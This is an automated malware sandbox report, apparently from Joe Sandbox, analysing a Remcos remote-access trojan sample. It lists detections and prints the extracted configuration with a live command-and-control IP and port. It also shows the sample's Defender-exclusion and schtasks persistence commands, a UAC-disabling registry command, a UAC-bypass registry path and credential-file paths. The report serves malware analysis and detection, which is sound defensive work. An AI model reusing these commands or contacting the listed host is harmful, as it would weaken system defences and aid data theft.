
Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Analysis ID: 1500386
MD5: b8896a4d1adbefcc7fe4cac53b134968
SHA1: e7a68f4c1ac47ecc6cc43b12dc82651cff63f670
SHA256: 7815d02dd41dd657438b4b226f4ac1a33d6a37159e34448627088e1354f9ab69
Tags: exe

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe (PID: 3884 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe" MD5: B8896A4D1ADBEFCC7FE4CAC53B134968)
    • powershell.exe (PID: 4416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2620 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • bmkNCLNkqvOpVZ.exe (PID: 1616 cmdline: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe MD5: B8896A4D1ADBEFCC7FE4CAC53B134968)
    • schtasks.exe (PID: 3940 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • bmkNCLNkqvOpVZ.exe (PID: 6204 cmdline: "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe" MD5: B8896A4D1ADBEFCC7FE4CAC53B134968)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "172.93.220.148:45682:0", "Assigned name": "3456789", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "765-8M14I5", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  • Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
  • Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
    • 0x691e0:$a1: Remcos restarted by watchdog!
    • 0x69738:$a3: %02i:%02i:%02i:%03i
    • 0x69abd:$a4: * Remcos v
  • Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
    • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6320c:$str_b2: Executing file:
    • 0x64328:$str_b3: GetDirectListeningPort
    • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x63e30:$str_b7: \update.vbs
    • 0x63234:$str_b9: Downloaded file:
    • 0x63220:$str_b10: Downloading file:
    • 0x632c4:$str_b12: Failed to upload file:
    • 0x642f0:$str_b13: StartForward
    • 0x64310:$str_b14: StopForward
    • 0x63dd8:$str_b15: fso.DeleteFile "
    • 0x63d6c:$str_b16: On Error Resume Next
    • 0x63e08:$str_b17: fso.DeleteFolder "
    • 0x632b4:$str_b18: Uploaded file:
    • 0x63274:$str_b19: Unable to delete:
    • 0x63da0:$str_b20: while fso.FileExists("
    • 0x63749:$str_c0: [Firefox StoredLogins not found]
  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; Description: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
    • 0x63100:$s1: \Classes\mscfile\shell\open\command
    • 0x63160:$s1: \Classes\mscfile\shell\open\command
    • 0x63148:$s2: eventvwr.exe
Source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp
  • Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack
  • Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
  • Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
    • 0x661e0:$a1: Remcos restarted by watchdog!
    • 0x66738:$a3: %02i:%02i:%02i:%03i
    • 0x66abd:$a4: * Remcos v
  • Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
    • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6020c:$str_b2: Executing file:
    • 0x61328:$str_b3: GetDirectListeningPort
    • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x60e30:$str_b7: \update.vbs
    • 0x60234:$str_b9: Downloaded file:
    • 0x60220:$str_b10: Downloading file:
    • 0x602c4:$str_b12: Failed to upload file:
    • 0x612f0:$str_b13: StartForward
    • 0x61310:$str_b14: StopForward
    • 0x60dd8:$str_b15: fso.DeleteFile "
    • 0x60d6c:$str_b16: On Error Resume Next
    • 0x60e08:$str_b17: fso.DeleteFolder "
    • 0x602b4:$str_b18: Uploaded file:
    • 0x60274:$str_b19: Unable to delete:
    • 0x60da0:$str_b20: while fso.FileExists("
    • 0x60749:$str_c0: [Firefox StoredLogins not found]
  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; Description: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
    • 0x60100:$s1: \Classes\mscfile\shell\open\command
    • 0x60160:$s1: \Classes\mscfile\shell\open\command
    • 0x60148:$s2: eventvwr.exe
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack
  • Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", ProcessId: 4416, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, ParentImage: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, ParentProcessId: 1616, ParentProcessName: bmkNCLNkqvOpVZ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp", ProcessId: 3940, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", ProcessId: 2620, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", ProcessId: 4416, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", ProcessId: 2620, ProcessName: schtasks.exe

Timestamp: 2024-08-28T11:37:58.812561+0200
SID: 2032777
Severity: 1
Source Port: 45682
Destination Port: 49712
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-08-28T11:37:57.926996+0200
SID: 2032776
Severity: 1
Source Port: 49712
Destination Port: 45682
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-08-28T11:40:00.330083+0200
SID: 2032777
Severity: 1
Source Port: 45682
Destination Port: 49712
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-08-28T11:42:01.566854+0200
SID: 2032777
Severity: 1
Source Port: 45682
Destination Port: 49712
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-08-28T11:38:00.275897+0200
SID: 2803304
Severity: 3
Source Port: 49714
Destination Port: 80
Protocol: TCP
Classtype: Unknown Traffic

AV Detection

Source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos (full configuration listed in the Classification section above)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Virustotal: Detection: 32%
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, Virustotal: Detection: 32%
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 14_2_004315EC
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_33c82500-f
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: snwo.pdbSHA256, source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr
Source: Binary string: snwo.pdb, source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 14_2_0041A01B
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 14_2_0040B28E
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 14_2_0040838E
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 14_2_004087A0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 14_2_00407848
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_004068CD FindFirstFileW,FindNextFileW, 14_2_004068CD
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0044BA59 FindFirstFileExA, 14_2_0044BA59
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 14_2_0040AA71
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 14_2_00417AAB
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 14_2_0040AC78
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 14_2_00406D28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, Code function: 4x nop then jmp 0739782Eh, 0_2_07396D4C
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 4x nop then lea esp, dword ptr [ebp-08h], 9_2_070F47A0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 4x nop then jmp 0A246AD6h, 9_2_0A245FF4

Networking

Source: Network traffic, Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49712 -> 172.93.220.148:45682
Source: Network traffic, Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.93.220.148:45682 -> 192.168.2.6:49712
Source: Malware configuration extractor, URLs: 172.93.220.148
Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1, Host: geoplugin.net, Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 178.237.33.50
Source: Joe Sandbox View, ASN Name: XTOM-AS-JPxTomJP
Source: Network traffic, Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49714 -> 178.237.33.50:80
Source: unknown, TCP traffic detected without corresponding DNS query: 172.93.220.148 (15 identical entries)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 14_2_0041936B
Source: global traffic, DNS traffic detected: DNS query: geoplugin.net
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/h
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554426544.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554292704.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, String found in binary or memory: http://geoplugin.net/json.gp
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp/C
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp:R
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gpX
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 00000009.00000002.2152867062.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000, 14_2_00409340
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard, 14_2_0040A65A
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 14_2_00414EC1
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, Code function: 14_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx, 14_2_00409468

          E-Banking Fraud

Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
